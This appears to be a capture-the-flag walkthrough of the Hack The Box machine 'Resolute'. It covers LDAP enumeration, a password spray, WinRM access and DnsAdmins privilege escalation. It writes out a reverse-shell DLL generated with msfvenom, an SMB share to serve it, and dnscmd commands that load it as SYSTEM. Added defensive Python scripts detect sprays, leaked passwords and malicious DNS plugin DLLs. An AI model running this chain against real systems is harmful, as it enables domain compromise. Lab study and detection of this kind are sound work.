HTB - Resolute

Nmap

nmap -sC -sV -p- -oN nmap/allports 10.10.10.169


The Nmap scan reveals some hostnames we can add to our /etc/hosts file.

 

SMB (fail)


At least we found out what the password policy for this domain is.

 

Ldap

We will be able to find more information by querying LDAP.

Run: ldapsearch -h 10.10.10.169 -x -s base namingcontexts


Run: ldapsearch -h 10.10.10.169 -x -b "DC=megabank,DC=local"

We get a large, messy output of users. We can narrow it down to person objects with the LDAP query below.

ldapsearch -h 10.10.10.169 -x -b "DC=megabank,DC=local" '(objectclass=person)' > persons.txt


We can further refine this and grab a list of usernames.

Run: cat persons.txt| grep -i samaccountname | awk '{print $2}' > userspray.txt 
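As an added example (not part of the original walkthrough), here is a small Python parser for ldapsearch's LDIF output. It does what the grep/awk pipeline above does, but also unfolds LDIF continuation lines and decodes base64 ("::") values, both of which the one-liner silently mangles. It also adds an audit function that flags description attributes mentioning a password: that attribute is readable by every domain user (and, with anonymous bind allowed as on this box, by anyone), which is exactly how a password turns up later in this walkthrough by reading the LDAP output by hand. The LDIF sample, the account names and the ChangeMe123! value are constructed for the example.

```python
import base64
import re
from typing import Dict, List, Tuple

# Constructed sample of ldapsearch LDIF output (not data from the box).
# LDIF folds long values onto a following line that starts with one space,
# and base64-encodes some values behind a "::" separator; grep/awk miss both.
SAMPLE_LDIF = """\
# refinement: (objectclass=person)
dn: CN=Jane Doe,OU=Staff,DC=example,DC=local
objectClass: person
sAMAccountName: jdoe
description: Helpdesk analyst

dn: CN=New Hire,OU=Staff,DC=example,DC=local
objectClass: person
sAMAccountName: nhire
description: Account created. Temporary password
  set to ChangeMe123! by IT

dn: CN=Svc Backup,OU=Service,DC=example,DC=local
objectClass: person
sAMAccountName:: c3ZjX2JhY2t1cA==
"""

ATTR_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9.;-]*)(::?) ?(.*)$")


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Parse LDIF into entries (attribute -> list of values), unfolding
    continuation lines and decoding base64 ("::") values."""
    # Step 1: unfold. A line starting with a single space continues the previous one.
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    # Step 2: split into entries at blank lines, ignoring comment lines.
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in lines + [""]:          # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue                   # not an "attr: value" line
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value.strip())
    return entries


def get_attr(entry: Dict[str, List[str]], name: str) -> List[str]:
    """Case-insensitive lookup (LDAP attribute names are case-insensitive)."""
    return [v for a, vs in entry.items() if a.lower() == name.lower() for v in vs]


def usernames(entries: List[Dict[str, List[str]]]) -> List[str]:
    """The grep -i samaccountname | awk '{print $2}' step, done on parsed entries."""
    return [v for e in entries for v in get_attr(e, "sAMAccountName")]


PASSWORD_HINT = re.compile(r"\b(pass(word|wd)?|pwd)\b", re.IGNORECASE)


def password_hints(entries: List[Dict[str, List[str]]]) -> List[Tuple[str, str]]:
    """Audit: (sAMAccountName, description) pairs whose description looks like it
    carries a password. Anything here is effectively public inside the domain."""
    hits = []
    for e in entries:
        sam = (get_attr(e, "sAMAccountName") or ["?"])[0]
        for desc in get_attr(e, "description"):
            if PASSWORD_HINT.search(desc):
                hits.append((sam, desc))
    return hits


if __name__ == "__main__":
    ents = parse_ldif(SAMPLE_LDIF)
    print("\n".join(usernames(ents)))          # the userspray.txt equivalent
    for sam, desc in password_hints(ents):
        print(f"AUDIT {sam}: {desc}")
```

Run against real output with parse_ldif(open("persons.txt").read()); an administrator can run the same password_hints check on a scheduled export to catch helpdesk habits like the one above before anyone else does.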




Awesome, we got some usernames we can try. Let's try running Impacket's GetNPUsers (this checks whether any of the users have the "Do not require Kerberos preauthentication" flag set and, if so, exports a hash).

 


No luck. With that not working, it's best to see what else we can enumerate, in case we missed something, before we try to brute force anything.

I started manually reading through the LDAP output and I found this:


Okay, awesome, let's try using these credentials. This could also be a password that is used across this domain for new users or for password resets.


Okay, no luck there, but we got a password we can try with all our usernames.



Another fail. That was spraying over SMB; let's give the other protocols crackmapexec supports a go, like winrm.


Awesome, success! We can now try to use evil-winrm to remote into the target.

Run: evil-winrm -i 10.10.10.169 -u melanie -p <password>

 


Now we can go and collect the user flag.
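Before moving on, a defender's view of the spray that got us in, as an added example that is not part of the original walkthrough. The password policy found earlier tells the attacker how many failures per account are safe, so per-account lockout never fires; what does stand out is one source address failing against many different accounts in a short window. The script below applies that rule to a constructed extract of failed-logon records (Security event 4625 on the target host, or 4771 on a domain controller for Kerberos pre-authentication failures); the addresses, account names and timestamps are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample: failed logons as a SIEM might export them, one per line:
# timestamp, source IP, target account. 203.0.113.5 tries one password against
# six accounts inside a few seconds (a spray); 198.51.100.7 hammers a single
# account (classic brute force, which per-account lockout already handles).
SAMPLE_4625 = """\
2019-12-03T06:30:01 203.0.113.5 alice
2019-12-03T06:30:02 203.0.113.5 bob
2019-12-03T06:30:02 203.0.113.5 carol
2019-12-03T06:30:03 203.0.113.5 dave
2019-12-03T06:30:04 203.0.113.5 erin
2019-12-03T06:30:05 203.0.113.5 frank
2019-12-03T07:15:00 198.51.100.7 alice
2019-12-03T07:15:09 198.51.100.7 alice
2019-12-03T07:15:20 198.51.100.7 alice
"""

Record = Tuple[datetime, str, str]


def parse_records(text: str) -> List[Record]:
    """Turn the export into (timestamp, source_ip, account) tuples."""
    out: List[Record] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user = line.split()
        out.append((datetime.fromisoformat(ts), ip, user.lower()))
    return out


def detect_spray(records: List[Record],
                 window: timedelta = timedelta(minutes=30),
                 min_users: int = 5) -> List[Tuple[str, List[str]]]:
    """Per source IP, find the largest set of distinct accounts that fail inside
    one sliding time window. A spray stays under the lockout threshold for each
    account, so we count accounts per source rather than attempts per account."""
    by_ip: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, ip, user in records:
        by_ip[ip].append((ts, user))
    alerts: List[Tuple[str, List[str]]] = []
    for ip, attempts in by_ip.items():
        attempts.sort()
        best: set = set()
        start = 0
        for end in range(len(attempts)):
            # slide the window start forward until it covers at most `window`
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            alerts.append((ip, sorted(best)))
    return alerts


if __name__ == "__main__":
    for ip, accounts in detect_spray(parse_records(SAMPLE_4625)):
        print(f"possible password spray from {ip}: {len(accounts)} accounts {accounts}")
```

The threshold and window are the tuning knobs: a helpdesk jump host may legitimately fail against a handful of accounts an hour, so baseline min_users per source before alerting on it.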

 

Privilege Escalation

For this part, scripts and tools will not get you to the next step; I tried winPEAS and BloodHound and nothing came up that we could use in this scenario.

So the best thing to do next was to search around. Remember that this is a CTF, so there is going to be a way to get the root flag.

Search through all directories, both visible and hidden. Looking at the root of C:\ we find a directory called PSTranscripts.

 


Keep going down into the directory until you find the text file called PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt. Reading the file, we see Ryan's password left in plain text for us to take.

 


With Ryan’s credentials we can now remote into the machine as him.



 

Looking through the directories again, checking Ryan's profile first, we see a note left on his desktop.



This makes me wonder as to what could be the next thing to check.

I ran: whoami /all


Okay, we see he is a part of DnsAdmins. When I was studying for the MCSA and CCNA, it was brought up in class that if a hacker got control over DNS it would be extremely troublesome.

A quick Google search leads me to this: From DnsAdmins to SYSTEM to Domain Compromise - Red Teaming Experiments (ired.team)

After reading that, it's clear we will need to upload a shell because we do not have an interactive session.

Note: The correct way to generate a shell without essentially stopping DNS would be to make a DLL and thread it so the DNS service keeps working. I have not coded in a C language in a long time, so I am quite rusty. Later this year, after I finish some certifications, I will write DNS persistence reverse shell code and put it on my GitHub; I will add it to this walkthrough later in the year.

 

So we can generate a shell with msfvenom.

Run: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.69 LPORT=9001 -f dll -o rev.dll



Then we just need to set up an SMB server so the target can retrieve the DLL.

Run: sudo impacket-smbserver <share name> $(pwd)

 

Now back to our winrm session; make sure you also have a netcat listener set up.

Run the following commands.

dnscmd 10.10.10.169 /config /serverlevelplugindll \\<your ip>\share\rev.dll

sc.exe stop dns

sc.exe start dns



 



We can now go and get the root flag.
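From the defender's side, the dnscmd / sc sequence above leaves a very recognisable trail. The following added Python example (not from the walkthrough or the ired.team post) shows two checks for it: rating the ServerLevelPluginDll registry value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters (a UNC path there means the DNS service, running as SYSTEM, will load code from a share on its next restart), and scanning a host log for the "set plugin DLL, then restart DNS" pattern. The registry location is taken from the public DnsAdmins research the post cites; the log extract is constructed, with event 4688 standing for process creation (command-line auditing must be enabled for the detail to exist) and 7036 for a Service Control Manager state change, and the account and paths mirror the ones used above.

```python
import re
from typing import List, Optional, Tuple

# Registry value that dnscmd /config /serverlevelplugindll writes (location per
# the public DnsAdmins research; this is how the DNS service finds the DLL).
PLUGIN_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters"
PLUGIN_VALUE = "ServerLevelPluginDll"


def assess_plugin_dll(value: Optional[str]) -> Tuple[str, str]:
    """Rate a ServerLevelPluginDll registry value as read from a DNS server.
    Returns (severity, reason) with severity in {'ok', 'review', 'critical'}."""
    if not value or not value.strip():
        return ("ok", "no server-level plugin DLL configured")
    path = value.strip()
    if path.startswith("\\\\"):
        # A UNC path means the DNS service (SYSTEM) pulls code from a remote
        # share on restart: exactly the pattern used in the walkthrough.
        return ("critical", f"plugin DLL loads from a network share: {path}")
    if path.lower().startswith("c:\\windows\\system32\\"):
        return ("review", f"plugin DLL under System32; confirm it is expected and signed: {path}")
    return ("critical", f"plugin DLL outside System32: {path}")


# Constructed host-log extract, one event per line:
# event_id|account|process|command line or message
SAMPLE_LOG = """\
4688|MEGABANK\\ryan|cmd.exe|dnscmd 10.10.10.169 /config /serverlevelplugindll \\\\10.10.14.69\\share\\rev.dll
4688|MEGABANK\\ryan|sc.exe|sc.exe stop dns
7036|SYSTEM|services.exe|The DNS Server service entered the stopped state.
4688|MEGABANK\\ryan|sc.exe|sc.exe start dns
7036|SYSTEM|services.exe|The DNS Server service entered the running state.
4688|MEGABANK\\ryan|cmd.exe|dnscmd /enumzones
"""

PLUGIN_CONFIG = re.compile(r"/serverlevelplugindll", re.IGNORECASE)
DNS_SERVICE_CTL = re.compile(r"\bsc(\.exe)?\s+(stop|start)\s+dns\b", re.IGNORECASE)
DNS_STATE = re.compile(r"DNS Server service entered the (stopped|running) state", re.IGNORECASE)


def scan_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, account, finding) for each event worth a second look."""
    findings: List[Tuple[int, str, str]] = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        event_id, account, _process, detail = line.split("|", 3)
        if event_id == "4688" and PLUGIN_CONFIG.search(detail):
            findings.append((n, account, "ServerLevelPluginDll set via dnscmd"))
        elif event_id == "4688" and DNS_SERVICE_CTL.search(detail):
            findings.append((n, account, "DNS service stopped/started from a shell"))
        elif event_id == "7036" and DNS_STATE.search(detail):
            findings.append((n, account, "DNS Server service state change"))
    return findings


def plugin_load_sequence(findings: List[Tuple[int, str, str]]) -> bool:
    """True when a plugin DLL configuration is later followed by a DNS service
    state change: the new DLL is only loaded when the service restarts, so the
    two together are the signal, not either one alone."""
    saw_config = False
    for _n, _acct, what in findings:
        if what.startswith("ServerLevelPluginDll"):
            saw_config = True
        elif saw_config and what.startswith("DNS Server service state change"):
            return True
    return False


if __name__ == "__main__":
    print(assess_plugin_dll(r"\\10.10.14.69\share\rev.dll"))
    hits = scan_log(SAMPLE_LOG)
    for n, acct, what in hits:
        print(f"line {n}: {acct}: {what}")
    print("plugin DLL load sequence:", plugin_load_sequence(hits))
```

The cheapest mitigation is also the obvious one: DnsAdmins membership should be reviewed like any other high-privilege group, and the registry value above can be polled or audited for changes (it is normally absent on a healthy server).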

 

Conclusion

This was quite a fun box, and it's quite easy to find where to go next if you just keep looking. It covers exploiting a misconfigured LDAP server, where you can gather a lot of information without any credentials, and exploiting DNS through DLL injection.

 

 
